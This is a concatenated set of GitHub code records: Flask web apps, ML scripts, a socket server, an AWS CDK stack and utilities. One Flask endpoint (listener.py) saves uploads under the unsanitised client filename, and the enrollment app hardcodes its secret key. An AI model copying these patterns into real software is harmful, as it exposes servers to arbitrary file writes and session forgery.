loss={loss(X, y, w_true, 0.0, _lambda):.2f}, model loss={loss(X, y, w, b, _lambda):.2f}\")\n plt.legend()\n plt.show()\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ejh3/LearningMachineLearning","sub_path":"[3]lasso/ISTA.py","file_name":"ISTA.py","file_ext":"py","file_size_in_byte":9475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42588807030","text":"from flask import Flask, request\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/save-file', methods=['POST'])\ndef save_file():\n # Get the file from the request\n file = request.files['file']\n\n # Save the file to a directory\n file.save(file.filename)\n\n return 'File saved successfully', 200\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=3000)\n","repo_name":"lorenz234/PromptToChain","sub_path":"backend/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5044371964","text":"# handles all the non-admin / basic user functionalities used by employees of the company\r\nfrom flask import Blueprint, render_template, request, flash, redirect, url_for\r\nfrom flask_login import login_user, login_required, current_user, logout_user\r\nfrom .models import SessionForm, Employee, Student\r\nfrom . import db\r\naccount = Blueprint('account', __name__)\r\n\r\n# automatically renders the homepage when user is logged in\r\n@account.route('/account/home')\r\n@login_required\r\ndef home():\r\n return render_template('home-page.html', user=current_user)\r\n\r\n# gives 'logged out' status to the user and redirects to login page when user clicks on 'Log Out' button\r\n@account.route('/account/logout')\r\n@login_required\r\ndef logout():\r\n logout_user()\r\n return redirect(url_for('auth.login'))\r\n\r\n# renders the learning session fill out page when user clicks \"Fill Out Session\"\r\n@account.route('/account/fill-out-session', methods=['GET','POST'])\r\n@login_required\r\ndef fill_out_session():\r\n # if user submits session information, then check conditions to make sure info meets all conditions\r\n if request.method == 'POST':\r\n student_name = request.form.get(\"student-name\")\r\n student_id = \"N/A\"\r\n for student in Student.query.all():\r\n if student.name == student_name:\r\n student_id = student.id\r\n subject_name = request.form.get(\"subject-name\")\r\n time_length = request.form.get(\"time-length\")\r\n prof_rating = request.form.get(\"proficiency-level\")\r\n description = request.form.get(\"description\")\r\n employee_id = current_user.id\r\n if student_name == \"select-name\":\r\n flash('Please select a student name.', category='error')\r\n elif len(subject_name) < 3:\r\n flash('Subject name must be more than two characters.', category='error')\r\n elif len(time_length) < 1:\r\n flash('Please enter a proficiency rating.', category='error')\r\n elif int(time_length) < 1:\r\n flash('Time length must be more than one minutes.', category='error')\r\n elif len(prof_rating) < 1:\r\n flash('Please enter a proficiency rating.', category='error')\r\n elif (int(prof_rating) < 1) or (int(prof_rating) > 5):\r\n flash('Proficiency rating must be between digits 1-5', category='error')\r\n elif len(description) < 11:\r\n flash('Description must be more than 10 characters.', category='error')\r\n else:\r\n new_session = SessionForm(student_name=student_name, student_id=student_id, 
subject_name=subject_name,\r\n description=description, proficiency_level=int(prof_rating), time_length=int(time_length), employee_id=current_user.id)\r\n db.session.add(new_session)\r\n db.session.commit()\r\n flash('Session successfully submitted!', category='success')\r\n return render_template('session-fillout-page.html', user=current_user, students=Student.query.all())\r\n\r\n# renders the session data page which provides user all sessions that the user has filled out\r\n@account.route('/account/past-session-data')\r\n@login_required\r\ndef session_data():\r\n return render_template('session-data.html', user=current_user)\r\n\r\n# allows user to update their account information\r\n@account.route('/account/account-settings', methods=['GET','POST'])\r\n@login_required\r\ndef account_settings():\r\n # if user submits new account information, then check conditions to make sure info meets all conditions\r\n if request.method == 'POST':\r\n username = request.form.get(\"username\")\r\n email = request.form.get(\"email\")\r\n first_name = request.form.get(\"first-name\")\r\n last_name = request.form.get(\"last-name\")\r\n if len(username) < 4:\r\n flash('Username must be greater than 3 characters.', category='error')\r\n elif len(email) < 4:\r\n flash('Email must be greater than 3 characters.', category='error')\r\n elif len(first_name) < 2:\r\n flash('First name must be greater than 1 character.', category='error')\r\n elif len(last_name) < 2:\r\n flash('Last name must be greater than 1 character.', category='error')\r\n else:\r\n # changes the account attributes of the current user within the database \r\n current_user.username = username\r\n current_user.email = email\r\n current_user.first_name = first_name\r\n current_user.last_name = last_name\r\n db.session.commit()\r\n return render_template('account-settings.html', user=current_user)\r\n\r\n","repo_name":"zainali1234/tutor-employee-management-webapp","sub_path":"account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41865041","text":"import sys\nsys.path.append('../')\nfrom pathlib import Path\nimport cv2\nfrom core.utils import *\nimport multiprocessing as mp\n\n\ndef convert(src, dst):\n img = cv2.imread(src, 0)\n img = CS.id2trainId[img.ravel()].reshape(img.shape)\n cv2.imwrite(dst, img)\n\ndef main():\n root = '../data/cityscapes/gtFine/train'\n dst_root = '../data/cityscapes/gtFine_trainIds/train'\n\n files = [x.resolve() for x in Path(root).rglob(\"*_labelIds.png\")]\n dst_root = Path(dst_root)\n dst_root.mkdir(parents=True, exist_ok=True)\n\n tasks = []\n for filename in files:\n tasks.append([str(filename), str(dst_root / filename.name.replace('_labelIds.png', '_trainIds.png'))])\n\n pool = mp.Pool(16)\n jobs = [pool.apply_async(convert, task) for task in tasks]\n [job.get() for job in jobs]\n\nmain()\n","repo_name":"js-fan/PntWSSS","sub_path":"tools/convert_cs_dataset.py","file_name":"convert_cs_dataset.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34178497659","text":"import asyncio\nimport time\nimport traceback\nfrom koala.koala_typing import *\nfrom koala.network.socket_session import SocketSession, SocketSessionManager\nfrom koala.logger import logger\n\n\n_session_manager = SocketSessionManager()\n_last_process_message_time = time.time()\n_message_handler: 
Optional[Callable[[SocketSession, Type, object], Coroutine]] = None\n_socket_close_handler: Optional[Callable[[SocketSession], None]] = None\n\n\ndef _process_income_socket(session: SocketSession):\n codec_id = session.codec.codec_id\n _session_manager.add_session(session)\n logger.debug(\n \"SocketSessionManager, SessionID:%d added, CodecID:%d\"\n % (session.session_id, codec_id)\n )\n return\n\n\ndef _process_close_socket(session_id: int):\n session = _session_manager.get_session(session_id)\n try:\n if session and _socket_close_handler:\n _socket_close_handler(session)\n except Exception as e:\n logger.error(\n \"SocketSessionManager, Before Remove SessionID:%d, Exception:%s\"\n % (session_id, e)\n )\n pass\n if session:\n _session_manager.remove_session(session_id)\n logger.debug(\"SocketSessionManager, SessionID:%d removed\" % session_id)\n return\n\n\nasync def _process_socket_message(session: SocketSession, clz: Type, msg: object):\n try:\n if _message_handler:\n await _message_handler(session, clz, msg)\n else:\n logger.error(\"process_socket_message, user message handler is None\")\n except Exception as e:\n logger.error(\n \"process_socket_message, SessionID:%d Exception:%s, StackTrace:%s\"\n % (session.session_id, e, traceback.format_exc())\n )\n\n\ndef _process_connect_success(session: SocketSession):\n if session:\n session.heart_beat(_last_process_message_time)\n logger.info(\n \"SocketSessionManager, SessionID:%d, ConnectSuccess\" % session.session_id\n )\n else:\n logger.error(\n \"SocketSessionManager, SessionID:%d not found\" % session.session_id\n )\n\n\ndef register_message_handler(\n handler: Callable[[SocketSession, Type, object], Coroutine]\n):\n global _message_handler\n _message_handler = handler\n pass\n\n\ndef register_socket_close_handler(handler: Callable[[SocketSession], None]):\n global _socket_close_handler\n _socket_close_handler = handler\n pass\n\n\nasync def update_message_time():\n global _last_process_message_time\n while True:\n await asyncio.sleep(1.0)\n _last_process_message_time = time.time()\n","repo_name":"egmkang/koala","sub_path":"koala/network/event_handler.py","file_name":"event_handler.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"3"} +{"seq_id":"22631914839","text":"from .views import devices, track, about_us, code_circuit, detailed, test, track_map, admin_login, logout_view\nfrom django.urls import path\n\nurlpatterns = [\n path('devices/', devices, name = 'devices'),\n path('logout/', logout_view, name = 'logout'),\n path('track/', track, name = 'track'),\n path('detailed/', detailed, name = 'detailed'),\n path('test/', test, name = 'test'),\n path('about_us/', about_us, name = 'about_us'),\n path('track_map/', track_map, name = 'track_map'),\n path('admin_login/', admin_login, name = 'admin_login'),\n path('code_circuit/', code_circuit, name = 'code_circuit')\n]","repo_name":"zIlgar/Caspian_Rescuer","sub_path":"telemetry_project/telemetry_project/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"6545488876","text":"from typing import TYPE_CHECKING\n\nfrom .equine import Equine, EquineOutput\nfrom .equine_gp import EquineGP\nfrom .equine_protonet import CovType, EquineProtonet\nfrom .utils import (\n brier_score,\n brier_skill_score,\n expected_calibration_error,\n generate_episode,\n generate_model_metrics,\n 
generate_model_summary,\n generate_support,\n generate_train_summary,\n)\n\nif not TYPE_CHECKING: # pragma: no cover\n try:\n from ._version import version as __version__\n except ImportError:\n __version__ = \"unknown version\"\nelse: # pragma: no cover\n __version__: str\n\n__all__ = [\n \"Equine\",\n \"EquineOutput\",\n \"EquineGP\",\n \"EquineProtonet\",\n \"CovType\",\n \"brier_score\",\n \"brier_skill_score\",\n \"expected_calibration_error\",\n \"generate_support\",\n \"generate_episode\",\n \"generate_model_metrics\",\n \"generate_train_summary\",\n \"generate_model_summary\",\n]\n","repo_name":"mit-ll-responsible-ai/equine","sub_path":"src/equine/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"36467851824","text":"'''\nCUDA_VISIBLE_DEVICES=0 python main.py --modality video \\\n --extract-feats \\\n --config-path ./configs/lrw_resnet18_dctcn.json \\\n --model-path ./models/lrw_resnet18_dctcn_video.pth.tar \\\n --mouth-patch-path mouth_vid.npz \\\n --mouth-embedding-out-path embeddings/emb_out.npz\n\n'''\n\n\n'''\nUsage: This bitty will combine a bunch of npzs into list of objects to be used for frozen pretrained\n\n'''\nimport gzip\nimport pickle\nimport torch\nimport numpy as np\nimport argparse\nimport os\nimport subprocess\nimport fnmatch\nfrom tqdm import tqdm\n\ndef find_files_with_extension(directory, extension):\n file_paths = []\n \n for root, dirs, files in os.walk(directory):\n for file in fnmatch.filter(files, f'*{extension}'):\n file_paths.append(os.path.join(root, file))\n \n return file_paths\n\n\ndef convert_images_to_embeddings(path_to_npzs):\n for path_to_npz in tqdm(path_to_npzs):\n # Execute the embedding command\n embedding_output_path = os.path.splitext(path_to_npz)[0] + \"_emb.npz\"\n\n subprocess.run(['python3', './LipEmbeddings/main.py', '--modality', 'video', '--extract-feats',\n '--config-path', './LipEmbeddings/configs/lrw_resnet18_dctcn.json',\n '--model-path', './LipEmbeddings/models/lrw_resnet18_dctcn_video.pth.tar',\n '--mouth-patch-path', path_to_npz,\n '--mouth-embedding-out-path', embedding_output_path])\n\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Video to Frames Converter')\n parser.add_argument(\"-d\", '--data-dir', default=None ,type=str, help='Path to the data directory')\n args = parser.parse_args()\n \n # Get all NPZs\n path_to_npzs = find_files_with_extension(args.data_dir, \"npz\")\n\n convert_images_to_embeddings(path_to_npzs)\n\nif __name__ == \"__main__\":\n main()","repo_name":"schefferac2020/LipReading","sub_path":"getty_embeddy.py","file_name":"getty_embeddy.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"27368864876","text":"import torch\nfrom gemini_torch.utils import ImgToEmbeddings\n\n# Example usage\nnum_patches = 16\npatch_size = 16\ntransformer_dim = 512\nimg_channels = 3\nseq_len = 50000\nreduced_dim = 256 # Reduced dimension after dimensionality reduction\n\nmodel = ImgToEmbeddings(\n num_patches, patch_size, transformer_dim, img_channels, seq_len, reduced_dim\n)\n\n# Dummy image input [BATCH, CHANNELS, HEIGHT, WIDTH]\ndummy_img = torch.randn(1, 3, 64, 64) # Batch size of 1, 64x64 RGB image\n\n# Forward pass\nseq_space_output = model(dummy_img)\nprint(seq_space_output.shape) # Expected shape: [1, 50000, 
256]\n","repo_name":"kyegomez/Gemini","sub_path":"tests/test_img_to_transformer.py","file_name":"test_img_to_transformer.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"28884284527","text":"# -*- coding: utf-8 -*-\n# -*- coding: -*-\n\nimport numpy as np\nimport sys\nimport re\nimport codecs\nimport os\nimport jieba\nimport gensim, logging\nfrom gensim.models import word2vec\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.externals import joblib\nfrom sklearn.preprocessing import scale\nfrom sklearn.svm import SVC\nfrom sklearn.decomposition import PCA\nfrom scipy import stats\nfrom sklearn.cross_validation import train_test_split\n# from keras.models import Sequential\n# from keras.layers import Dense, Dropout, Activation\n# from keras.optimizers import SGD\nfrom sklearn.metrics import f1_score\n# from bayes_opt import BayesianOptimization as BO\nfrom sklearn.metrics import roc_curve\nimport matplotlib.pyplot as plt\nimport sklearn\nfrom sklearn.metrics import roc_auc_score as auc\nfrom sklearn.metrics import accuracy_score as acc\n\n\ndef parseSent(sentence):\n seg_list = jieba.cut(sentence)\n output = ''.join(list(seg_list)) # use space to join them\n return output\n\n\ndef sent2word(sentence):\n \"\"\"\n Segment a sentence to words\n Delete stopwords\n \"\"\"\n segResult = []\n segList = jieba.cut(''.join(re.findall(u'[\\u4e00-\\u9fff]+', sentence)))\n for w in segList:\n segResult.append(w)\n stopwords = readLines('/home/nyh/work/workspace/dataanalysis/dmlib/data/nlp/stopWords.txt')\n newSent = []\n stopwords_list = []\n for word in segResult:\n if word in stopwords:\n # print \"stopword: %s\" % word\n continue\n else:\n newSent.append(word)\n # output = ' '.join(list(newSent))\n return newSent\n\n\ndef eachFile(filepath):\n pathDir = os.listdir(filepath)\n child = []\n for allDir in pathDir:\n child.append(os.path.join('%s/%s' % (filepath, allDir)))\n return child\n\n\ndef readLines(filename):\n fopen = open(filename, 'r')\n data = []\n for x in fopen.readlines():\n if x.strip() != '':\n data.append(x.strip())\n fopen.close()\n return data\n\n\ndef readFile(filename):\n data = []\n for x in filename:\n fopen = open(x, 'r')\n for eachLine in fopen:\n if eachLine.strip() != '':\n data.append(eachLine.strip())\n fopen.close()\n return data\n\n\ndef getWordVecs(wordList):\n vecs = []\n for word in wordList:\n word = word.replace('\\n', '')\n try:\n vecs.append(model[word])\n except KeyError:\n continue\n return np.array(vecs, dtype = 'float')\n\n\ndef buildVecs(filename):\n posInput = []\n with open(filename, \"r\", encoding = \"utf-8\") as txtfile:\n for lines in txtfile:\n lines = lines.split('\\n')\n if lines[0] == \"\\r\" or lines[0] == \"\\r\\n\" or lines[0] == \"\\r\\r\":\n pass\n else:\n\n for line in lines:\n line = list(jieba.cut(line))\n\n resultList = getWordVecs(line)\n\n # for each sentence, the mean vector of all its vectors is used to represent this sentence\n if len(resultList) != 0:\n resultArray = sum(np.array(resultList)) / len(resultList)\n posInput.append(resultArray)\n return posInput\n\n\n# load word2vec model\n# 训练模型输出模型\nos.chdir(\"/home/nyh/work/workspace/dataanalysis/dmlib/\")\nfilepwd = eachFile(\"/home/nyh/work/workspace/dataanalysis/dmlib/data/nlp/test\")\nsentences = []\nfor x in filepwd:\n data = readLines(x)\n for line in data:\n sentences.extend(sent2word(line))\n # sentences.append(data[0])\n\nmodel = 
gensim.models.Word2Vec(sentences, min_count=0, size = 500)\n# outp1 = 'corpus.model.bin'\n# model.save(outp1)\n\nfilepwd_pos = eachFile('../data/pos')\nfilepwd_neg = eachFile('../data/neg')\n\npos_number = 0\nneg_number = 0\nposInput = []\nnegInput = []\nfor pos in filepwd_pos:\n pos_buildVecs = buildVecs(pos)\n posInput.extend(pos_buildVecs)\n pos_number += 1\n if pos_number == 100:\n break\nfor neg in filepwd_neg:\n neg_buildVecs = buildVecs(neg)\n negInput.extend(neg_buildVecs)\n neg_number += 1\n if neg_number == 100:\n break\n\ny = np.concatenate((np.ones(len(posInput)), np.zeros(len(negInput))))\n\nX = posInput[:]\n\nfor neg in negInput:\n X.append(neg)\n\nX = np.array(X)\n\nX = scale(X)\n\nX_reduced = PCA(n_components=100).fit_transform(X)\n\n# X_reduced_train,X_reduced_test, y_reduced_train, y_reduced_test =train_test_split(X_reduced,y)\n\n\nX_reduced_train, X_reduced_test, y_reduced_train, y_reduced_test = train_test_split(X_reduced, y, test_size=0.4,\n random_state=1)\n\n\"\"\"\nSVM (RBF)\n using training data with 100 dimensions\n\"\"\"\n\nclf = SVC(C=2, probability=True)\nclf.fit(X_reduced_train, y_reduced_train)\nprint\n'Test Accuracy: %.2f' % clf.score(X_reduced_test, y_reduced_test)\n\npred_probas = clf.predict_proba(X_reduced_test)[:, 1]\n\n# print \"KS value: %f\" % KSmetric(y_reduced_test, pred_probas)[0]\n\n# plot ROC curve# AUC = 0.92# KS = 0.7\n\n\n# 输出相关结果 以及绘图\nprint(\"test:\")\nprint(clf.predict(X_reduced_test))\nprint(\"value:\")\nprint(y_reduced_test)\n\ntest_value = clf.predict(X_reduced_test)\n\nindex = []\nfor x in range(0, len(test_value)):\n index.append(x + 1)\n\ntest_value_1 = 0\ntest_value_0 = 0\nfor test_value_data in test_value:\n if test_value_data == 1:\n test_value_1 += 1\n else:\n test_value_0 += 1\n\ny_reduced_test_1 = 0\ny_reduced_test_0 = 0\nfor y_reduced_test_data in y_reduced_test:\n if y_reduced_test_data == 1:\n y_reduced_test_1 += 1\n else:\n y_reduced_test_0 += 1\n\ntest_value_label = 'test pos: ' + str(test_value_1) + ' neg: ' + str(test_value_0)\ny_reduced_test_label = 'value pos: ' + str(y_reduced_test_1) + ' neg: ' + str(y_reduced_test_0)\n\nplt.plot(index, test_value, 'ro', label=test_value_label)\nplt.plot(index, y_reduced_test, 'b.', label=y_reduced_test_label)\nplt.xlim([0, len(test_value)])\nplt.ylim([-2, 2])\nplt.legend(loc='lower right')\nplt.show()\n\nfpr, tpr, _ = roc_curve(y_reduced_test, pred_probas)\nroc_auc = sklearn.metrics.auc(fpr, tpr)\nplt.plot(fpr, tpr, label='roc_auc = %.2f' % roc_auc)\nplt.plot([0, 1], [0, 1], 'k--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.legend(loc='lower right')\nplt.show()","repo_name":"std-in/dataanalysis","sub_path":"dmlib/src/main/python/nlp/sentiment/SentimentMeachineLearning.py","file_name":"SentimentMeachineLearning.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7444554053","text":"#--*-- coding:UTF8 --*--\nimport socket, sys\n\nhost = sys.argv[1]\nport = sys.argv[2]\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind( (host, port) )\ns.listen(1)\nclient, direction = s.accept()\nprint(direction)\nprint(client.getpeername())\n\nclient.send(\"Hola Cliente\\n introduzca una palabra o fin si desea terminar la conversacion\")\nwhile 1:\n data = client.recv(1024)\n if data == \"fin\\n\":\n break\n print(\"cliente > \" + data)\n palabra = input(\"Servidor > \")\n 
client.send(palabra)\n\nclient.close()\ns.close()","repo_name":"AlejandroPenaSanchez/Python-Tests","sub_path":"Sockets/Server-2.py","file_name":"Server-2.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19700578720","text":"from aws_cdk import (\n aws_iam as iam,\n aws_s3 as s3,\n CfnOutput,\n Stack,\n Token,\n)\nfrom constructs import Construct\n\n\nclass MyFirstCdkProjectStack(Stack):\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n # The code that defines your stack goes here\n\n s3.Bucket(\n self,\n \"myBucketId\",\n bucket_name=\"tleonhafirstcdkproject\",\n versioned=False,\n encryption=s3.BucketEncryption.S3_MANAGED,\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL,\n )\n\n my_bucket = s3.Bucket(\n self,\n \"myBucketId1\",\n )\n\n sns_topic_name = \"abczys\"\n\n if not Token.is_unresolved(sns_topic_name) and len(sns_topic_name) > 10:\n raise ValueError(\"Maximum value can be only 10 characters\")\n\n print(my_bucket.bucket_name)\n\n iam.Group(\n self,\n \"gid\",\n )\n\n output_1 = CfnOutput(\n self,\n \"myBucketOutput1\",\n value=my_bucket.bucket_name,\n description=\"My first CDK Bucket\",\n export_name=\"myBucketOutput1\",\n )\n","repo_name":"tleonhardt/my-first-cdk-project","sub_path":"my_first_cdk_project/my_first_cdk_project_stack.py","file_name":"my_first_cdk_project_stack.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21599242750","text":"from flask import Flask, render_template, jsonify, request, redirect, session, g\nfrom flask_restful import Api, Resource\nfrom flask.helpers import url_for\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_admin import Admin\nfrom flask_admin.contrib.sqla import ModelView\nfrom distutils.log import error\nimport json\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'\ndb = SQLAlchemy(app)\napi = Api(app)\nadmin = Admin(app)\n# secret key requried for sessions\napp.secret_key = 'TEAM106'\n\n\nclass Users(db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(80), unique=True, nullable=False)\n password = db.Column(db.String(80), unique=False, nullable=False)\n # handles 1 to 1\n teachers = db.relationship(\"Teachers\", backref='users', uselist=False)\n students = db.relationship(\"Students\", backref='users', uselist=False)\n\n def __repr__(self) -> str:\n return '' % self.username\n\n\nclass Teachers(db.Model):\n __tablename__ = 'teachers'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), unique=True, nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n # handles 1 to many\n classes = db.relationship('Classes', backref='teacher')\n\n def __repr__(self) -> str:\n return '' % self.name\n\n\nclass Enrollment_table(db.Model):\n __tablename__ = 'enrollment_table'\n id = db.Column(db.Integer, primary_key=True)\n class_id = db.Column('class_id', db.Integer)\n student_id = db.Column('student_id', db.Integer)\n grade = db.Column('grade', db.Integer)\n\n def __repr__(self) -> str:\n return '' % self.id\n\n\nclass Students(db.Model):\n __tablename__ = 'students'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), unique=True, nullable=False)\n user_id = db.Column(db.Integer, 
db.ForeignKey('users.id'))\n\n def __repr__(self) -> str:\n return '' % self.name\n\n\nclass Classes(db.Model):\n __tablename__ = 'classes'\n id = db.Column(db.Integer, primary_key=True)\n course_name = db.Column(db.String(80), unique=True, nullable=False)\n teacher_id = db.Column(db.Integer, db.ForeignKey('teachers.id'))\n num_enrolled = db.Column(db.Integer, unique=False, nullable=False)\n capacity = db.Column(db.Integer, unique=False, nullable=False)\n day_time = db.Column(db.String(80), unique=False, nullable=False)\n\n def __repr__(self) -> str:\n return '' % self.course_name\n\n\nclass SecureModelView(ModelView):\n def is_accessible(self):\n try:\n return session['user_id'] == Users.query.filter_by(id=1).first().id\n except:\n return False\n\n\nadmin.add_view(SecureModelView(Classes, db.session))\nadmin.add_view(SecureModelView(Students, db.session))\nadmin.add_view(SecureModelView(Enrollment_table, db.session))\nadmin.add_view(SecureModelView(Teachers, db.session))\nadmin.add_view(SecureModelView(Users, db.session))\n\n\ndef add_class(current_class, potential_class):\n\n if(len(current_class) == 18):\n # print('here')\n current_class_days = current_class[0:3].strip()\n current_class_start = current_class[3:9].strip()\n current_class_end = current_class[10:15].strip()\n eve_current = current_class[15:].strip()\n else:\n current_class_days = current_class[0:3].strip()\n current_class_start = current_class[2:8].strip()\n current_class_end = current_class[9:14].strip()\n eve_current = current_class[14:].strip()\n if(len(potential_class) == 17):\n potential_class_days = potential_class[0:3].strip()\n potential_class_start = potential_class[2:8].strip()\n potential_class_end = potential_class[9:14].strip()\n eve_potential = potential_class[14:].strip()\n else:\n potential_class_days = potential_class[0:3].strip()\n potential_class_start = potential_class[3:9].strip()\n potential_class_end = potential_class[10:15].strip()\n eve_potential = potential_class[15:].strip()\n\n for char in current_class_days:\n if char in potential_class_days:\n if(eve_current != eve_potential):\n return True\n else:\n if((current_class_start > potential_class_start and current_class_start > potential_class_end)\n or (current_class_start < potential_class_start and current_class_end < potential_class_start)):\n return True\n else:\n return False\n return True\n\n\nclass getPotentialClasses(Resource):\n def get(self):\n if 'user_id' in session:\n query_student = Students.query.filter_by(\n user_id=session['user_id']).first()\n query = db.session.query(\n Enrollment_table.metadata.tables['enrollment_table']).all()\n class_id = []\n potential_classes = []\n current_classes = []\n\n bool_classes = []\n\n for cls in query:\n if cls[2] == query_student.id:\n class_id.append(cls[1])\n current_classes.append([cls[1], cls[2], cls[3]])\n json_data = json.loads(\"{}\")\n for cls in query:\n if cls[2] != query_student.id and cls[1] not in class_id:\n potential_classes.append([cls[1], cls[2], cls[3]])\n\n # this is calculating the number of students enrolled in potential classes\n for i, cls in enumerate(potential_classes):\n count = 0\n for q in query:\n if cls[0] == q[1]:\n count += 1\n potential_classes[i].append(count)\n for i, cls in enumerate(current_classes):\n count = 0\n for q in query:\n if cls[0] == q[1]:\n count += 1\n current_classes[i].append(count)\n # this is formatting the data to be sent out\n for cls in potential_classes:\n potential_cls = Classes.query.filter_by(id=cls[0]).first()\n potential_teacher = 
Teachers.query.filter_by(\n id=potential_cls.teacher_id).first()\n for cur in current_classes:\n current_cls = Classes.query.filter_by(id=cur[0]).first()\n current_teacher = Teachers.query.filter_by(\n id=current_cls.teacher_id).first()\n bool_classes.append(\n add_class(current_cls.day_time, potential_cls.day_time))\n json_data.update({cur[0]: {\"class_name\": current_cls.course_name, \"time\": current_cls.day_time,\n \"teacher_name\": current_teacher.name, \"num_enrolled\": cur[3], 'capacity': current_cls.capacity, \"addable\": 0}})\n if False not in bool_classes and cls[3] < potential_cls.capacity:\n json_data.update({cls[0]: {\"class_name\": potential_cls.course_name, \"time\": potential_cls.day_time,\n \"teacher_name\": potential_teacher.name, \"num_enrolled\": cls[3], 'capacity': potential_cls.capacity, \"addable\": 1}})\n bool_classes.clear()\n else:\n json_data.update({cls[0]: {\"class_name\": potential_cls.course_name, \"time\": potential_cls.day_time,\n \"teacher_name\": potential_teacher.name, \"num_enrolled\": cls[3], 'capacity': potential_cls.capacity, \"addable\": 0}})\n bool_classes.clear()\n return json_data\n return error(400)\n\n\nclass updateDB(Resource):\n def put(self):\n json_data = request.data\n # to double quotes to make it valid JSON\n my_json = json_data.decode('utf8').replace(\"'\", '\"')\n\n # Load the JSON to a Python list & dump it back out as formatted JSON\n data = json.loads(my_json)\n s = json.dumps(data, indent=4, sort_keys=True)\n json_data = json.loads(s)\n for name in json_data['student']:\n query_student = Students.query.filter_by(name=name).first()\n query = Enrollment_table.query.filter_by(\n student_id=query_student.id, class_id=json_data['class_id']).first()\n print(query.class_id, query.student_id)\n query.grade = json_data['student'][name]\n db.session.commit()\n\n\nclass addCourse(Resource):\n def post(self):\n json_data = json.loads(request.data)\n course = json_data[\"class_id\"]\n query_student = Students.query.filter_by(\n user_id=session['user_id']).first()\n current_cls = Classes.query.filter_by(course_name=course).first()\n enrolled1 = Enrollment_table(\n class_id=current_cls.id, student_id=query_student.id, grade=0)\n db.session.add(enrolled1)\n db.session.commit()\n return 200\n\n\nclass getClasses(Resource):\n def get(self):\n if 'user_id' in session:\n query_student = Students.query.filter_by(\n user_id=session['user_id']).first()\n query = Enrollment_table.query.all()\n list_classes = []\n # retrieve all classes for the given student\n for cls in query:\n if cls.student_id == query_student.id:\n list_classes.append(\n [cls.class_id, cls.student_id, cls.grade])\n json_data = json.loads(\"{}\")\n\n # this is calculating the number of students enrolled in 1 class\n for i, cls in enumerate(list_classes):\n count = 0\n for q in query:\n if cls[0] == q.class_id:\n count += 1\n list_classes[i].append(count)\n # this is formatting the data to be sent out\n for cls in list_classes:\n current_cls = Classes.query.filter_by(id=cls[0]).first()\n current_teacher = Teachers.query.filter_by(\n id=current_cls.teacher_id).first()\n json_data.update({cls[0]: {\"class_name\": current_cls.course_name, \"time\": current_cls.day_time,\n \"teacher_name\": current_teacher.name, \"num_enrolled\": cls[3], 'capacity': current_cls.capacity}})\n return json_data\n return error(400)\n\n\nclass getTeacherClasses(Resource):\n def get(self):\n if 'user_id' in session:\n query_teacher = Teachers.query.filter_by(\n user_id=session['user_id']).first()\n query_classes 
= Classes.query.filter_by(\n teacher_id=query_teacher.id).all()\n query = Enrollment_table.query.all()\n\n list_classes = []\n list_class_id = []\n # retrieve all classes for the given student\n for cls in query:\n for q in query_classes:\n if cls.class_id == q.id:\n list_classes.append(\n [cls.class_id, cls.student_id, cls.grade])\n list_class_id.append(cls.class_id)\n json_data = json.loads(\"{}\")\n\n # this is calculating the number of students enrolled in 1 class\n for i, cls in enumerate(list_classes):\n count = 0\n for q in query:\n if cls[0] == q.class_id:\n count += 1\n list_classes[i].append(count)\n # this is formatting the data to be sent out\n for cls in query_classes:\n if cls.id in list_class_id:\n index = list_class_id.index(cls.id)\n num_enrolled = list_classes[index][3]\n else:\n num_enrolled = 0\n json_data.update({cls.id: {\"class_name\": cls.course_name, \"time\": cls.day_time,\n \"teacher_name\": query_teacher.name, \"num_enrolled\": num_enrolled, 'capacity': cls.capacity}})\n return json_data\n return error(400)\n\n\napi.add_resource(getClasses, '/student/classes')\napi.add_resource(getTeacherClasses, 